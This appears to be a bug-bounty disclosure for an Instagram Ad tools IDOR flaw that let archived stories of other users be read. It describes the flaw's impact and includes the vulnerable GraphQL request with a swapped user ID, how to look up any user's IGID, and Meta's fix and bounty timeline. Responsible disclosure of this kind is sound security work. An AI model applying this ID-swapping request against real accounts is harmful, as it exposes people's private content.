Description:
A IDOR vulnerability was present in the Ad tools feature for Instagram Business users. This was done by modifying the IGID of a user in the HTTP request when accessing own archived stories.
Impact:
An attacker could be able to access all archived stories of Instagram user. Only small subset of Instagram users(Including Instagram Co-Founders) were affected by this bug.
Vulnerable Endpoint
POST /api/v1/ads/graphql/ HTTP/2
Host: i.instagram.com
Authorization: Bearer IGT:2:<BASE64_TOKEN>
variables={"count":15,"timeframe":"LIFETIME","queryParams":{"id":"<IGID>"}}&client_doc_id=2305****IGID for any user can be obtained by www.instagram.com/<username>/?__a=1&__d=dis
Bounty Explanation by Meta:
Timeline
30 July 2022 at 16:37 : Report sent
30 July 2022 at 19:03 : Report Triaged
13 August 2022 : Fix message
13 August 2022 : Bounty Awarded